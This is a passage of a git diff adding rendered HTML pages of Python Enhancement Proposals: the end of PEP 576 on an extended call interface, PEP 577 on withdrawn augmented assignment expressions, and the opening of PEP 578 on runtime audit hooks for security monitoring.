Changes to existing C structs

+

The function, method_descriptor and method classes will have their corresponding structs changed to +start with the PyExtendedCallable struct.

+
+
+
+

Third-party built-in classes using the new extended call interface

+

To enable call performance on a par with Python functions and built-in functions, third-party callables should set the Py_TPFLAGS_EXTENDED_CALL bit of tp_flags and ensure that the corresponding C struct starts with the PyExtendedCallable. +Any built-in class that has the Py_TPFLAGS_EXTENDED_CALL bit set must also implement the tp_call function and make sure its behaviour is consistent with the ext_call function.

+
+

Performance implications of these changes

+

Adding a function pointer to each callable, rather than each class of callable, enables the choice of dispatching function (the code to shuffle arguments about and do error checking) to be made when the callable object is created rather than when it is called. This should reduce the number of instructions executed between the call-site in the interpreter and the execution of the callee.

+
+
+
+
+

Alternative Suggestions

+

PEP 580 is an alternative approach to solving the same problem as this PEP.

+
+
+

Reference implementation

+

A draft implementation can be found at https://github.com/markshannon/cpython/tree/pep-576-minimal

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0576.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0577/index.html b/pep-0577/index.html new file mode 100644 index 00000000000..9a0d7c98cbb --- /dev/null +++ b/pep-0577/index.html @@ -0,0 +1,921 @@ + + + + + + + + PEP 577 – Augmented Assignment Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 577 – Augmented Assignment Expressions

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
14-May-2018
+
Python-Version:
+
3.8
+
Post-History:
+
22-May-2018
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

While working on this PEP, I realised that it didn’t really address what was +actually bothering me about PEP 572’s proposed scoping rules for previously +unreferenced assignment targets, and also had some significant undesirable +consequences (most notably, allowing >>= and <<= as inline augmented +assignment operators that meant something entirely different from the >= +and <= comparison operators).

+

I also realised that even without dedicated syntax of their own, PEP 572 +technically allows inline augmented assignments to be written using the +operator module:

+
from operator import iadd
+if (target := iadd(target, value)) < limit:
+    ...
+
+
+

The restriction to simple names as inline assignment targets means that the +target expression can always be repeated without side effects, and thus avoids +the ambiguity that would arise from allowing actual embedded augmented +assignments (it’s still a bad idea, since it would almost certainly be hard +for humans to read, this note is just about the theoretical limits of language +level expressiveness).

+

Accordingly, I withdrew this PEP without submitting it for pronouncement. At +the time I also started writing a replacement PEP that focused specifically on +the handling of assignment targets which hadn’t already been declared as local +variables in the current scope (for both regular block scopes, and for scoped +expressions), but that draft never even reached a stage where I liked it +better than the ultimately accepted proposal in PEP 572, so it was never +posted anywhere, nor assigned a PEP number.

+
+
+

Abstract

+

This is a proposal to allow augmented assignments such as x += 1 to be +used as expressions, not just statements.

+

As part of this, NAME := EXPR is proposed as an inline assignment expression +that uses the new augmented assignment scoping rules, rather than implicitly +defining a new local variable name the way that existing name binding +statements do. The question of allowing expression level local variable +declarations at function scope is deliberately separated from the question of +allowing expression level name bindings, and deferred to a later PEP.

+

This PEP is a direct competitor to PEP 572 (although it borrows heavily from that +PEP’s motivation, and even shares the proposed syntax for inline assignments). +See Relationship with PEP 572 for more details on the connections between +the two PEPs.

+

To improve the usability of the new expressions, a semantic split is proposed +between the handling of augmented assignments in regular block scopes (modules, +classes, and functions), and the handling of augmented assignments in scoped +expressions (lambda expressions, generator expressions, and comprehensions), +such that all inline assignments default to targeting the nearest containing +block scope.

+

A new compile time TargetNameError is added as a subclass of SyntaxError +to handle cases where it is deemed to be currently unclear which target is +expected to be rebound by an inline assignment, or else the target scope +for the inline assignment is considered invalid for another reason.

+
+
+

Syntax and semantics

+
+

Augmented assignment expressions

+

The language grammar would be adjusted to allow augmented assignments to +appear as expressions, where the result of the augmented assignment +expression is the same post-calculation reference as is being bound to the +given target.

+

For example:

+
>>> n = 0
+>>> n += 5
+5
+>>> n -= 2
+3
+>>> n *= 3
+9
+>>> n
+9
+
+
+

For mutable targets, this means the result is always just the original object:

+
>>> seq = []
+>>> seq_id = id(seq)
+>>> seq += range(3)
+[0, 1, 2]
+>>> seq_id == id(seq)
+True
+
+
+

Augmented assignments to attributes and container subscripts will be permitted, +with the result being the post-calculation reference being bound to the target, +just as it is for simple name targets:

+
def increment(self, step=1):
+    return self._value += step
+
+
+

In these cases, __getitem__ and __getattribute__ will not be called +after the assignment has already taken place (they will only be called as +needed to evaluate the in-place operation).

+
+
+

Adding an inline assignment operator

+

Given only the addition of augmented assignment expressions, it would be +possible to abuse a symbol like |= as a general purpose assignment +operator by defining a Target wrapper type that worked as follows:

+
>>> class Target:
+...     def __init__(self, value):
+...         self.value = value
+...     def __or__(self, other):
+...         return Target(other)
+...
+>>> x = Target(10)
+>>> x.value
+10
+>>> x |= 42
+<__main__.Target object at 0x7f608caa8048>
+>>> x.value
+42
+
+
+

This is similar to the way that storing a single reference in a list was long +used as a workaround for the lack of a nonlocal keyword, and can still be +used today (in combination with operator.itemsetter) to work around the +lack of expression level assignments.

+

Rather than requiring such workarounds, this PEP instead proposes that +PEP 572’s “NAME := EXPR” syntax be adopted as a new inline assignment +expression that uses the augmented assignment scoping rules described below.

+

This cleanly handles cases where only the new value is of interest, and the +previously bound value (if any) can just be discarded completely.

+

Note that for both simple names and complex assignment targets, the inline +assignment operator does not read the previous reference before assigning +the new one. However, when used at function scope (either directly or inside +a scoped expression), it does not implicitly define a new local variable, +and will instead raise TargetNameError (as described for augmented +assignments below).

+
+
+

Assignment operator precedence

+

To preserve the existing semantics of augmented assignment statements, +inline assignment operators will be defined as being of lower precedence +than all other operators, include the comma pseudo-operator. This ensures +that when used as a top level expression the entire right hand side of the +expression is still interpreted as the value to be processed (even when that +value is a tuple without parentheses).

+

The difference this introduces relative to PEP 572 is that where +(n := first, second) sets n = first in PEP 572, in this PEP it would set +n = (first, second), and getting the first meaning would require an extra +set of parentheses (((n := first), second)).

+

PEP 572 quite reasonably notes that this results in ambiguity when assignment +expressions are used as function call arguments. This PEP resolves that concern +a different way by requiring that assignment expressions be parenthesised +when used as arguments to a function call (unless they’re the sole argument).

+

This is a more relaxed version of the restriction placed on generator +expressions (which always require parentheses, except when they’re the sole +argument to a function call).

+
+
+

Augmented assignment to names in block scopes

+

No target name binding changes are proposed for augmented assignments at module +or class scope (this also includes code executed using “exec” or “eval”). These +will continue to implicitly declare a new local variable as the binding target +as they do today, and (if necessary) will be able to resolve the name from an +outer scope before binding it locally.

+

At function scope, augmented assignments will be changed to require that there +be either a preceding name binding or variable declaration to explicitly +establish the target name as being local to the function, or else an explicit +global or nonlocal declaration. TargetNameError, a new +SyntaxError subclass, will be raised at compile time if no such binding or +declaration is present.

+

For example, the following code would compile and run as it does today:

+
x = 0
+x += 1 # Sets global "x" to 1
+
+class C:
+    x += 1 # Sets local "x" to 2, leaves global "x" alone
+
+def local_target():
+    x = 0
+    x += 1 # Sets local "x" to 1, leaves global "x" alone
+
+def global_target():
+    global x
+    x += 1 # Increments global "x" each time this runs
+
+def nonlocal_target():
+    x = 0
+    def g():
+        nonlocal x
+        x += 1 # Increments "x" in outer scope each time this runs
+        return x
+    return g
+
+
+

The follow examples would all still compile and then raise an error at runtime +as they do today:

+
n += 1 # Raises NameError at runtime
+
+class C:
+    n += 1 # Raises NameError at runtime
+
+def missing_global():
+    global n
+    n += 1 # Raises NameError at runtime
+
+def delayed_nonlocal_initialisation():
+    def f():
+        nonlocal n
+        n += 1
+    f() # Raises NameError at runtime
+    n = 0
+
+def skipped_conditional_initialisation():
+    if False:
+        n = 0
+    n += 1 # Raises UnboundLocalError at runtime
+
+def local_declaration_without_initial_assignment():
+    n: typing.Any
+    n += 1 # Raises UnboundLocalError at runtime
+
+
+

Whereas the following would raise a compile time DeprecationWarning +initially, and eventually change to report a compile time TargetNameError:

+
def missing_target():
+    x += 1 # Compile time TargetNameError due to ambiguous target scope
+           # Is there a missing initialisation of "x" here? Or a missing
+           # global or nonlocal declaration?
+
+
+

As a conservative implementation approach, the compile time function name +resolution change would be introduced as a DeprecationWarning in Python +3.8, and then converted to TargetNameError in Python 3.9. This avoids +potential problems in cases where an unused function would currently raise +UnboundLocalError if it was ever actually called, but the code is actually +unused - converting that latent runtime defect to a compile time error qualifies +as a backwards incompatible change that requires a deprecation period.

+

When augmented assignments are used as expressions in function scope (rather +than as standalone statements), there aren’t any backwards compatibility +concerns, so the compile time name binding checks would be enforced immediately +in Python 3.8.

+

Similarly, the new inline assignment expressions would always require explicit +predeclaration of their target scope when used as part of a function, at least +for Python 3.8. (See the design discussion section for notes on potentially +revisiting that restriction in the future).

+
+
+

Augmented assignment to names in scoped expressions

+

Scoped expressions is a new collective term being proposed for expressions that +introduce a new nested scope of execution, either as an intrinsic part of their +operation (lambda expressions, generator expressions), or else as a way of +hiding name binding operations from the containing scope (container +comprehensions).

+

Unlike regular functions, these scoped expressions can’t include explicit +global or nonlocal declarations to rebind names directly in an outer +scope.

+

Instead, their name binding semantics for augmented assignment expressions would +be defined as follows:

+
    +
  • augmented assignment targets used in scoped expressions are expected to either +be already bound in the containing block scope, or else have their scope +explicitly declared in the containing block scope. If no suitable name +binding or declaration can be found in that scope, then TargetNameError +will be raised at compile time (rather than creating a new binding within +the scoped expression).
  • +
  • if the containing block scope is a function scope, and the target name is +explicitly declared as global or nonlocal, then it will be use the +same scope declaration in the body of the scoped expression
  • +
  • if the containing block scope is a function scope, and the target name is +a local variable in that function, then it will be implicitly declared as +nonlocal in the body of the scoped expression
  • +
  • if the containing block scope is a class scope, than TargetNameError will +always be raised, with a dedicated message indicating that combining class +scopes with augmented assignments in scoped expressions is not currently +permitted.
  • +
  • if a name is declared as a formal parameter (lambda expressions), or as an +iteration variable (generator expressions, comprehensions), then that name +is considered local to that scoped expression, and attempting to use it as +the target of an augmented assignment operation in that scope, or any nested +scoped expression, will raise TargetNameError (this is a restriction that +could potentially be lifted later, but is being proposed for now to simplify +the initial set of compile time and runtime semantics that needs to be +covered in the language reference and handled by the compiler and interpreter)
  • +
+

For example, the following code would work as shown:

+
>>> global_target = 0
+>>> incr_global_target = lambda: global_target += 1
+>>> incr_global_target()
+1
+>>> incr_global_target()
+2
+>>> global_target
+2
+>>> def cumulative_sums(data, start=0)
+...    total = start
+...    yield from (total += value for value in data)
+...    return total
+...
+>>> print(list(cumulative_sums(range(5))))
+[0, 1, 3, 6, 10]
+
+
+

While the following examples would all raise TargetNameError:

+
class C:
+    cls_target = 0
+    incr_cls_target = lambda: cls_target += 1 # Error due to class scope
+
+def missing_target():
+    incr_x = lambda: x += 1 # Error due to missing target "x"
+
+def late_target():
+    incr_x = lambda: x += 1 # Error due to "x" being declared after use
+    x = 1
+
+lambda arg: arg += 1 # Error due to attempt to target formal parameter
+
+[x += 1 for x in data] # Error due to attempt to target iteration variable
+
+
+

As augmented assignments currently can’t appear inside scoped expressions, the +above compile time name resolution exceptions would be included as part of the +initial implementation rather than needing to be phased in as a potentially +backwards incompatible change.

+
+
+
+

Design discussion

+
+

Allowing complex assignment targets

+

The initial drafts of this PEP kept PEP 572’s restriction to single name targets +when augmented assignments were used as expressions, allowing attribute and +subscript targets solely for the statement form.

+

However, enforcing that required varying the permitted targets based on whether +or not the augmented assignment was a top level expression or not, as well as +explaining why n += 1, (n += 1), and self.n += 1 were all legal, +but (self.n += 1) was prohibited, so the proposal was simplified to allow +all existing augmented assignment targets for the expression form as well.

+

Since this PEP defines TARGET := EXPR as a variant on augmented assignment, +that also gained support for assignment and subscript targets.

+
+
+

Augmented assignment or name binding only?

+

PEP 572 makes a reasonable case that the potential use cases for inline +augmented assignment are notably weaker than those for inline assignment in +general, so it’s acceptable to require that they be spelled as x := x + 1, +bypassing any in-place augmented assignment methods.

+

While this is at least arguably true for the builtin types (where potential +counterexamples would probably need to focus on set manipulation use cases +that the PEP author doesn’t personally have), it would also rule out more +memory intensive use cases like manipulation of NumPy arrays, where the data +copying involved in out-of-place operations can make them impractical as +alternatives to their in-place counterparts.

+

That said, this PEP mainly exists because the PEP author found the inline +assignment proposal much easier to grasp as “It’s like +=, only skipping +the addition step”, and also liked the way that that framing provides an +actual semantic difference between NAME = EXPR and NAME := EXPR at +function scope.

+

That difference in target scoping behaviour means that the NAME := EXPR +syntax would be expected to have two primary use cases:

+
    +
  • as a way of allowing assignments to be embedded as an expression in an if +or while statement, or as part of a scoped expression
  • +
  • as a way of requesting a compile time check that the target name be previously +declared or bound in the current function scope
  • +
+

At module or class scope, NAME = EXPR and NAME := EXPR would be +semantically equivalent due to the compiler’s lack of visibility into the set +of names that will be resolvable at runtime, but code linters and static +type checkers would be encouraged to enforce the same “declaration or assignment +required before use” behaviour for NAME := EXPR as the compiler would +enforce at function scope.

+
+
+

Postponing a decision on expression level target declarations

+

At least for Python 3.8, usage of inline assignments (whether augmented or not) +at function scope would always require a preceding name binding or scope +declaration to avoid getting TargetNameError, even when used outside a +scoped expression.

+

The intent behind this requirement is to clearly separate the following two +language design questions:

+
    +
  1. Can an expression rebind a name in the current scope?
  2. +
  3. Can an expression declare a new name in the current scope?
  4. +
+

For module global scopes, the answer to both of those questions is unequivocally +“Yes”, because it’s a language level guarantee that mutating the globals() +dict will immediately impact the runtime module scope, and global NAME +declarations inside a function can have the same effect (as can importing the +currently executing module and modifying its attributes).

+

For class scopes, the answer to both questions is also “Yes” in practice, +although less unequivocally so, since the semantics of locals() are +currently formally unspecified. However, if the current behaviour of locals() +at class scope is taken as normative (as PEP 558 proposes), then this is +essentially the same scenario as manipulating the module globals, just using +locals() instead.

+

For function scopes, however, the current answers to these two questions are +respectively “Yes” and “No”. Expression level rebinding of function locals is +already possible thanks to lexically nested scopes and explicit nonlocal NAME +expressions. While this PEP will likely make expression level rebinding more +common than it is today, it isn’t a fundamentally new concept for the language.

+

By contrast, declaring a new function local variable is currently a statement +level action, involving one of:

+
    +
  • an assignment statement (NAME = EXPR, OTHER_TARGET = NAME = EXPR, etc)
  • +
  • a variable declaration (NAME : EXPR)
  • +
  • a nested function definition
  • +
  • a nested class definition
  • +
  • a for loop
  • +
  • a with statement
  • +
  • an except clause (with limited scope of access)
  • +
+

The historical trend for the language has actually been to remove support for +expression level declarations of function local names, first with the +introduction of “fast locals” semantics (which made the introduction of names +via locals() unsupported for function scopes), and again with the hiding +of comprehension iteration variables in Python 3.0.

+

Now, it may be that in Python 3.9, we decide to revisit this question based on +our experience with expression level name binding in Python 3.8, and decide that +we really do want expression level function local variable declarations as well, +and that we want NAME := EXPR to be the way we spell that (rather than, +for example, spelling inline declarations more explicitly as +NAME := EXPR given NAME, which would permit them to carry type annotations, +and also permit them to declare new local variables in scoped expressions, +rather than having to pollute the namespace in their containing scope).

+

But the proposal in this PEP is that we explicitly give ourselves a full +release to decide how much we want that feature, and exactly where we find +its absence irritating. Python has survived happily without expression level +name bindings or declarations for decades, so we can afford to give ourselves +a couple of years to decide if we really want both of those, or if expression +level bindings are sufficient.

+
+
+

Ignoring scoped expressions when determining augmented assignment targets

+

When discussing possible binding semantics for PEP 572’s assignment expressions, +Tim Peters made a plausible case [1], [2], [3] for assignment expressions targeting +the containing block scope, essentially ignoring any intervening scoped +expressions.

+

This approach allows use cases like cumulative sums, or extracting the final +value from a generator expression to be written in a relatively straightforward +way:

+
total = 0
+partial_sums = [total := total + value for value in data]
+
+factor = 1
+while any(n % (factor := p) == 0 for p in small_primes):
+    n //= factor
+
+
+

Guido also expressed his approval for this general approach [4].

+

The proposal in this PEP differs from Tim’s original proposal in three main +areas:

+
    +
  • it applies the proposal to all augmented assignment operators, not just a +single new name binding operator
  • +
  • as far as is practical, it extends the augmented assignment requirement that +the name already be defined to the new name binding operator (raising +TargetNameError rather than implicitly declaring new local variables at +function scope)
  • +
  • it includes lambda expressions in the set of scopes that get ignored for +target name binding purposes, making this transparency to assignments common +to all of the scoped expressions rather than being specific to comprehensions +and generator expressions
  • +
+

With scoped expressions being ignored when calculating binding targets, it’s +once again difficult to detect the scoping difference between the outermost +iterable expressions in generator expressions and comprehensions (you have to +mess about with either class scopes or attempting to rebind iteration Variables +to detect it), so there’s also no need to tinker with that.

+
+
+

Treating inline assignment as an augmented assignment variant

+

One of the challenges with PEP 572 is the fact that NAME = EXPR and +NAME := EXPR are entirely semantically equivalent at every scope. This +makes the two forms hard to teach, since there’s no inherent nudge towards +choosing one over the other at the statement level, so you end up having to +resort to “NAME = EXPR is preferred because it’s been around longer” +(and PEP 572 proposes to enforce that historical idiosyncrasy at the compiler +level).

+

That semantic equivalence is difficult to avoid at module and class scope while +still having if NAME := EXPR: and while NAME := EXPR: work sensibly, but +at function scope the compiler’s comprehensive view of all local names makes +it possible to require that the name be assigned or declared before use, +providing a reasonable incentive to continue to default to using the +NAME = EXPR form when possible, while also enabling the use of the +NAME := EXPR as a kind of simple compile time assertion (i.e. explicitly +indicating that the targeted name has already been bound or declared and hence +should already be known to the compiler).

+

If Guido were to declare that support for inline declarations was a hard +design requirement, then this PEP would be updated to propose that +EXPR given NAME also be introduced as a way to support inline name declarations +after arbitrary expressions (this would allow the inline name declarations to be +deferred until the end of a complex expression rather than needing to be +embedded in the middle of it, and PEP 8 would gain a recommendation encouraging +that style).

+
+
+

Disallowing augmented assignments in class level scoped expressions

+

While modern classes do define an implicit closure that’s visible to method +implementations (in order to make __class__ available for use in zero-arg +super() calls), there’s no way for user level code to explicitly add +additional names to that scope.

+

Meanwhile, attributes defined in a class body are ignored for the purpose of +defining a method’s lexical closure, which means adding them there wouldn’t +work at an implementation level.

+

Rather than trying to resolve that inherent ambiguity, this PEP simply +prohibits such usage, and requires that any affected logic be written somewhere +other than directly inline in the class body (e.g. in a separate helper +function).

+
+
+

Comparison operators vs assignment operators

+

The OP= construct as an expression currently indicates a comparison +operation:

+
x == y # Equals
+x >= y # Greater-than-or-equal-to
+x <= y # Less-than-or-equal-to
+
+
+

Both this PEP and PEP 572 propose adding at least one operator that’s somewhat +similar in appearance, but defines an assignment instead:

+
x := y # Becomes
+
+
+

This PEP then goes much further and allows all 13 augmented assignment symbols +to be uses as binary operators:

+
x +=  y # In-place add
+x -=  y # In-place minus
+x *=  y # In-place multiply
+x @=  y # In-place matrix multiply
+x /=  y # In-place division
+x //= y # In-place int division
+x %=  y # In-place mod
+x &=  y # In-place bitwise and
+x |=  y # In-place bitwise or
+x ^=  y # In-place bitwise xor
+x <<= y # In-place left shift
+x >>= y # In-place right shift
+x **= y # In-place power
+
+
+

Of those additional binary operators, the most questionable would be the +bitshift assignment operators, since they’re each only one doubled character +away from one of the inclusive ordered comparison operators.

+
+
+
+

Examples

+
+

Simplifying retry loops

+

There are currently a few different options for writing retry loops, including:

+
# Post-decrementing a counter
+remaining_attempts = MAX_ATTEMPTS
+while remaining_attempts:
+    remaining_attempts -= 1
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {attempts} attempts")
+    break # Success!
+else:
+    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+
+# Loop-and-a-half with a pre-incremented counter
+attempt = 0
+while True:
+    attempts += 1
+    if attempts > MAX_ATTEMPTS:
+        raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {attempts} attempts")
+    break # Success!
+
+
+

Each of the available options hides some aspect of the intended loop structure +inside the loop body, whether that’s the state modification, the exit condition, +or both.

+

The proposal in this PEP allows both the state modification and the exit +condition to be included directly in the loop header:

+
attempt = 0
+while (attempt += 1) <= MAX_ATTEMPTS:
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {attempts} attempts")
+    break # Success!
+else:
+    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+
+
+
+
+

Simplifying if-elif chains

+

if-elif chains that need to rebind the checked condition currently need to +be written using nested if-else statements:

+
m = pattern.match(data)
+if m:
+    ...
+else:
+    m = other_pattern.match(data)
+    if m:
+        ...
+    else:
+        m = yet_another_pattern.match(data)
+        if m:
+            ...
+        else:
+            ...
+
+
+

As with PEP 572, this PEP allows the else/if portions of that chain to be +condensed, making their consistent and mutually exclusive structure more +readily apparent:

+
m = pattern.match(data)
+if m:
+    ...
+elif m := other_pattern.match(data):
+    ...
+elif m := yet_another_pattern.match(data):
+    ...
+else:
+    ...
+
+
+

Unlike PEP 572, this PEP requires that the assignment target be explicitly +indicated as local before the first use as a := target, either by +binding it to a value (as shown above), or else by including an appropriate +explicit type declaration:

+
m: typing.re.Match
+if m := pattern.match(data):
+    ...
+elif m := other_pattern.match(data):
+    ...
+elif m := yet_another_pattern.match(data):
+    ...
+else:
+    ...
+
+
+
+
+

Capturing intermediate values from comprehensions

+

The proposal in this PEP makes it straightforward to capture and reuse +intermediate values in comprehensions and generator expressions by +exporting them to the containing block scope:

+
factor: int
+while any(n % (factor := p) == 0 for p in small_primes):
+    n //= factor
+
+total = 0
+partial_sums = [total += value for value in data]
+
+
+
+
+

Allowing lambda expressions to act more like re-usable code thunks

+

This PEP allows the classic closure usage example:

+
def make_counter(start=0):
+    x = start
+    def counter(step=1):
+        nonlocal x
+        x += step
+        return x
+    return counter
+
+
+

To be abbreviated as:

+
def make_counter(start=0):
+    x = start
+    return lambda step=1: x += step
+
+
+

While the latter form is still a conceptually dense piece of code, it can be +reasonably argued that the lack of boilerplate (where the “def”, “nonlocal”, +and “return” keywords and two additional repetitions of the “x” variable name +have been replaced with the “lambda” keyword) may make it easier to read in +practice.

+
+
+
+

Relationship with PEP 572

+

The case for allowing inline assignments at all is made in PEP 572. This +competing PEP was initially going to propose an alternate surface syntax +(EXPR given NAME = EXPR), while retaining the expression semantics from +PEP 572, but that changed when discussing one of the initial motivating use +cases for allowing embedded assignments at all: making it possible to easily +calculate cumulative sums in comprehensions and generator expressions.

+

As a result of that, and unlike PEP 572, this PEP focuses primarily on use +cases for inline augmented assignment. It also has the effect of converting +cases that currently inevitably raise UnboundLocalError at function call +time to report a new compile time TargetNameError.

+

New syntax for a name rebinding expression (NAME := TARGET) is then added +not only to handle the same use cases as are identified in PEP 572, but also +as a lower level primitive to help illustrate, implement and explain +the new augmented assignment semantics, rather than being the sole change being +proposed.

+

The author of this PEP believes that this approach makes the value of the new +flexibility in name rebinding clearer, while also mitigating many of the +potential concerns raised with PEP 572 around explaining when to use +NAME = EXPR over NAME := EXPR (and vice-versa), without resorting to +prohibiting the bare statement form of NAME := EXPR outright (such +that NAME := EXPR is a compile error, but (NAME := EXPR) is permitted).

+
+
+

Acknowledgements

+

The PEP author wishes to thank Chris Angelico for his work on PEP 572, and his +efforts to create a coherent summary of the great many sprawling discussions +that spawned on both python-ideas and python-dev, as well as Tim Peters for +the in-depth discussion of parent local scoping that prompted the above +scoping proposal for augmented assignments inside scoped expressions.

+

Eric Snow’s feedback on a pre-release version of this PEP helped make it +significantly more readable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0577.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0578/index.html b/pep-0578/index.html new file mode 100644 index 00000000000..f5b8e09b07c --- /dev/null +++ b/pep-0578/index.html @@ -0,0 +1,755 @@ + + + + + + + + PEP 578 – Python Runtime Audit Hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 578 – Python Runtime Audit Hooks

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
BDFL-Delegate:
+
Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Jun-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Mar-2019, 07-May-2019
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Audit events table.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP describes additions to the Python API and specific behaviors +for the CPython implementation that make actions taken by the Python +runtime visible to auditing tools. Visibility into these actions +provides opportunities for test frameworks, logging frameworks, and +security tools to monitor and optionally limit actions taken by the +runtime.

+

This PEP proposes adding two APIs to provide insights into a running +Python application: one for arbitrary events, and another specific to +the module import system. The APIs are intended to be available in all +Python implementations, though the specific messages and values used +are unspecified here to allow implementations the freedom to determine +how best to provide information to their users. Some examples likely +to be used in CPython are provided for explanatory purposes.

+

See PEP 551 for discussion and recommendations on enhancing the +security of a Python runtime making use of these auditing APIs.

+
+
+

Background

+

Python provides access to a wide range of low-level functionality on +many common operating systems. While this is incredibly useful for +“write-once, run-anywhere” scripting, it also makes monitoring of +software written in Python difficult. Because Python uses native system +APIs directly, existing monitoring tools either suffer from limited +context or auditing bypass.

+

Limited context occurs when system monitoring can report that an +action occurred, but cannot explain the sequence of events leading to +it. For example, network monitoring at the OS level may be able to +report “listening started on port 5678”, but may not be able to +provide the process ID, command line, parent process, or the local +state in the program at the point that triggered the action. Firewall +controls to prevent such an action are similarly limited, typically +to process names or some global state such as the current user, and +in any case rarely provide a useful log file correlated with other +application messages.

+

Auditing bypass can occur when the typical system tool used for an +action would ordinarily report its use, but accessing the APIs via +Python do not trigger this. For example, invoking “curl” to make HTTP +requests may be specifically monitored in an audited system, but +Python’s “urlretrieve” function is not.

+

Within a long-running Python application, particularly one that +processes user-provided information such as a web app, there is a risk +of unexpected behavior. This may be due to bugs in the code, or +deliberately induced by a malicious user. In both cases, normal +application logging may be bypassed resulting in no indication that +anything out of the ordinary has occurred.

+

Additionally, and somewhat unique to Python, it is very easy to affect +the code that is run in an application by manipulating either the +import system’s search path or placing files earlier on the path than +intended. This is often seen when developers create a script with the +same name as the module they intend to use - for example, a +random.py file that attempts to import the standard library +random module.

+

This is not sandboxing, as this proposal does not attempt to prevent +malicious behavior (though it enables some new options to do so). +See the Why Not A Sandbox section below for further discussion.

+
+
+

Overview of Changes

+

The aim of these changes is to enable both application developers and +system administrators to integrate Python into their existing +monitoring systems without dictating how those systems look or behave.

+

We propose two API changes to enable this: an Audit Hook and Verified +Open Hook. Both are available from Python and native code, allowing +applications and frameworks written in pure Python code to take +advantage of the extra messages, while also allowing embedders or +system administrators to deploy builds of Python where auditing is +always enabled.

+

Only CPython is bound to provide the native APIs as described here. +Other implementations should provide the pure Python APIs, and +may provide native versions as appropriate for their underlying +runtimes. Auditing events are likewise considered implementation +specific, but are bound by normal feature compatibility guarantees.

+
+

Audit Hook

+

In order to observe actions taken by the runtime (on behalf of the +caller), an API is required to raise messages from within certain +operations. These operations are typically deep within the Python +runtime or standard library, such as dynamic code compilation, module +imports, DNS resolution, or use of certain modules such as ctypes.

+

The following new C APIs allow embedders and CPython implementors to +send and receive audit hook messages:

+
# Add an auditing hook
+typedef int (*hook_func)(const char *event, PyObject *args,
+                         void *userData);
+int PySys_AddAuditHook(hook_func hook, void *userData);
+
+# Raise an event with all auditing hooks
+int PySys_Audit(const char *event, PyObject *args);
+
+
+

The new Python APIs for receiving and raising audit hooks are:

+
# Add an auditing hook
+sys.addaudithook(hook: Callable[[str, tuple]])
+
+# Raise an event with all auditing hooks
+sys.audit(str, *args)
+
+
+

Hooks are added by calling PySys_AddAuditHook() from C at any time, +including before Py_Initialize(), or by calling +sys.addaudithook() from Python code. Hooks cannot be removed or +replaced. For CPython, hooks added from C are global, while hooks added +from Python are only for the current interpreter. Global hooks are +executed before interpreter hooks.

+

When events of interest are occurring, code can either call +PySys_Audit() from C (while the GIL is held) or sys.audit(). The +string argument is the name of the event, and the tuple contains +arguments. A given event name should have a fixed schema for arguments, +which should be considered a public API (for each x.y version release), +and thus should only change between feature releases with updated +documentation. To minimize overhead and simplify handling in native code +hook implementations, named arguments are not supported.

+

For maximum compatibility, events using the same name as an event in +the reference interpreter CPython should make every attempt to use +compatible arguments. Including the name or an abbreviation of the +implementation in implementation-specific event names will also help +prevent collisions. For example, a pypy.jit_invoked event is clearly +distinguished from an ipy.jit_invoked event. Events raised from +Python modules should include their module or package name in the event +name.

+

While event names may be arbitrary UTF-8 strings, for consistency across +implementations it is recommended to use valid Python dotted names and +avoid encoding specific details in the name. For example, an import +event with the module name spam as an argument is preferable to a +spam module imported event with no arguments. Avoid using embedded +null characters or you may upset those who implement hooks using C.

+

When an event is audited, each hook is called in the order it was added +(as much as is possible), passing the event name and arguments. If any +hook returns with an exception set, later hooks are ignored and in +general the Python runtime should terminate - exceptions from hooks are +not intended to be handled or treated as expected occurrences. This +allows hook implementations to decide how to respond to any particular +event. The typical responses will be to log the event, abort the +operation with an exception, or to immediately terminate the process with +an operating system exit call.

+

When an event is audited but no hooks have been set, the audit() +function should impose minimal overhead. Ideally, each argument is a +reference to existing data rather than a value calculated just for the +auditing call.

+

As hooks may be Python objects, they need to be freed during +interpreter or runtime finalization. These should not be triggered at +any other time, and should raise an event hook to ensure that any +unexpected calls are observed.

+

Below in Suggested Audit Hook Locations, we recommend some important +operations that should raise audit events. In general, events should be +raised at the lowest possible level. Given the choice between raising an +event from Python code or native code, raising from native code should be +preferred.

+

Python implementations should document which operations will raise +audit events, along with the event schema. It is intentional that +sys.addaudithook(print) is a trivial way to display all messages.

+
+
+

Verified Open Hook

+

Most operating systems have a mechanism to distinguish between files +that can be executed and those that can not. For example, this may be an +execute bit in the permissions field, a verified hash of the file +contents to detect potential code tampering, or file system path +restrictions. These are an important security mechanism for ensuring +that only code that has been approved for a given environment is +executed.

+

